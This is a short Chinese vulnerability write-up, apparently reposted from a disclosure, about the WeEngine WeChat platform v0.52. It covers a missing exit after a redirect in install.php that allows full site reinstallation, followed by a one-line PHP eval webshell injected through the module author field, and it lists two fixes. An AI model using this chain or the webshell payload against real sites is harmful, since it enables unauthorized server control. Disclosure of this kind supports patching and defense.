来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 微擎-微信公众平台自助引擎系统整站重装+SQL注入getshellhttp: www we7 cc 源码下载,量还是挺大的。验证为v0 52,漏洞应该是版本通杀。http: bbs we7 cc forum php?mod=viewthreadtid=1155在 install php文件...
http://www.we7.cc/源码下载,量还是挺大的。验证为v0.52,漏洞应该是版本通杀。
http://bbs.we7.cc/forum.php?mod=viewthread&tid=1155
在/install.php文件中26~28行代码如下:
if(file_exists(IA_ROOT . '/data/install.lock') && $action != 'finish') { header('location: ./index.php'); }
如果满足条件,则跳转到index.php,但header并没有阻止程序继续往下执行。通过构造post包,可以实现整站重装。
http://127.0.0.1/weixin/member.php?act=login&
admin/111111进行登录,在全局设置---模块管理---模块设计中添加一个新的模块
在作者框内填写一句话木马*/eval($_POST[chopper]);/*,生成模块模板
webshell地址:
http://127.0.0.1/weixin/source/modules/test/module.php
修复方案:
1.安装完后自动删除install.php文件,或满足条件处跳转后退出;
2.sql注入处正确过滤。
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com